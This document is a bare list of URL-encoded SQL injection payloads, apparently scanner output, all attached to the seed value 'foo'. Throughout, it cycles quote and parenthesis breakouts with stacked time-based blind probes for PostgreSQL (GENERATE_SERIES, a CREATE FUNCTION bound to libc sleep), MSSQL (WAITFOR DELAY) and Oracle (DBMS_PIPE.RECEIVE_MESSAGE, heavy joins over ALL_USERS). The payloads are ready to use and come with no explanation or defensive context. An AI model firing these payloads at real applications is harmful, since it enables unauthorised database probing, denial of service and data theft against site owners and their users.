foo%25%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%25%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%25%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%25%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%00%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%00%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%29%20WHERE%209817%3D9817%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%22%29%20WHERE%202983%3D2983%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%29%20WHERE%206143%3D6143%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%20WHERE%208261%3D8261%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%22%20WHERE%205478%3D5478%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%20WHERE%203352%3D3352%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%7C%7C%28SELECT%20%27NELe%27%20FROM%20DUAL%20WHERE%206016%3D6016%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%7C%7C%28SELECT%20%27wFTB%27%20WHERE%203542%3D3542%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%2B%28SELECT%20msOz%20WHERE%208659%3D8659%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%2B%28SELECT%20%27sQmw%27%20WHERE%203529%3D3529%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- foo%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%22%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%22%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%22%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%22%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%22%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%22%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%25%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%25%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%25%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%25%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%00%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%00%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%29%20WHERE%201731%3D1731%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%22%29%20WHERE%207442%3D7442%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%29%20WHERE%206069%3D6069%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%20WHERE%208725%3D8725%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%22%20WHERE%205736%3D5736%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%20WHERE%205571%3D5571%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%7C%7C%28SELECT%20%27fFGd%27%20FROM%20DUAL%20WHERE%202180%3D2180%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%7C%7C%28SELECT%20%27gSHx%27%20WHERE%205430%3D5430%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%2B%28SELECT%20LYeV%20WHERE%209782%3D9782%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%2B%28SELECT%20%27nbML%27%20WHERE%201040%3D1040%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%27%20IN%20BOOLEAN%20MODE%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- foo%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%25%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%25%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%25%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%25%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%00%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%00%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%20WHERE%203797%3D3797%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%29%20WHERE%207894%3D7894%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%29%20WHERE%203794%3D3794%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%20WHERE%208148%3D8148%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%20WHERE%208069%3D8069%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%20WHERE%201683%3D1683%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%7C%7C%28SELECT%20%27ydnd%27%20FROM%20DUAL%20WHERE%207339%3D7339%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%7C%7C%28SELECT%20%27hzja%27%20WHERE%206995%3D6995%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%2B%28SELECT%20kMCP%20WHERE%206698%3D6698%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%2B%28SELECT%20%27MuyC%27%20WHERE%204129%3D4129%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%20IN%20BOOLEAN%20MODE%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%22%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%22%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%22%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%22%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%22%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%22%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%25%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%25%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%25%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%25%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%00%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%00%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%29%20WHERE%202870%3D2870%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%22%29%20WHERE%204980%3D4980%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%29%20WHERE%201945%3D1945%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%20WHERE%209202%3D9202%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%22%20WHERE%206439%3D6439%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%20WHERE%201940%3D1940%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%7C%7C%28SELECT%20%27xiDS%27%20FROM%20DUAL%20WHERE%204150%3D4150%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%7C%7C%28SELECT%20%27rUBr%27%20WHERE%204412%3D4412%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%2B%28SELECT%20Hdwr%20WHERE%204962%3D4962%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%2B%28SELECT%20%27cyXE%27%20WHERE%203990%3D3990%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%2881%29%7C%7CCHR%28106%29%2C5%29%20FROM%20DUAL-- foo%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 